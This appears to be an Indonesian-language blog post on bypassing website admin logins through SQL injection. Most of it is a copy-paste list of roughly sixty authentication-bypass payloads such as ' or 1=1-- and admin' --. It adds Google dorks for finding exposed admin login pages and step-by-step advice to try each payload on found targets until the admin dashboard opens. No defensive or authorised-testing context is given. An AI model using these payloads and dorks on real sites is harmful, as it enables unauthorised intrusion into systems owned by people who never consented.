Kali ini saya akan membuat artikel tentang cara bypass admin login dengan metode yang sebenarnya sama dengan injection yaitu menginputkan karakter ke dalam form username dan password tanpa harus mengetahui user dan pass yang sebenarnya dengan karakter SQL atau seperti karakter '1=1' atau dengan payload lain nya, dibawah ini saya juga telah menyertakan kumpulan payload yang bisa di gunakan untuk bypass sehingga kalian dapat langsung copas saja.
Payload Bypass Admin.
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
'=''or'
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 limit 1 -- -+
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
Silahkan copas payload diatas jika ingin mencoba bypass admin login, coba satu persatu hingga Anda berhasil, masuk sebagai administrator.
Dork Google:
inurl:/admin.php
inurl:/admin/login.php
Tutorial Bypass Admin:
1. Jika sudah mendapat target Kalian langsung masukkan payload yang ada di atas hingga berhasil masuk ke dalam halaman dashboard admin. Lihat gambar di bawah.
2. Terlihat setelah kita memasukkan salah satu payload yang ada di atas maka kita telah masuk ke dalam halaman Dashboard admin.
Selesai sepertinya kita sampai di sini saja, dan lain kali saya akan buat artikel baru terus kunjungi blog saya untuk mendapat artikel dan ebook baru dan gratis
0 Komentar
Penulisan markup di komentar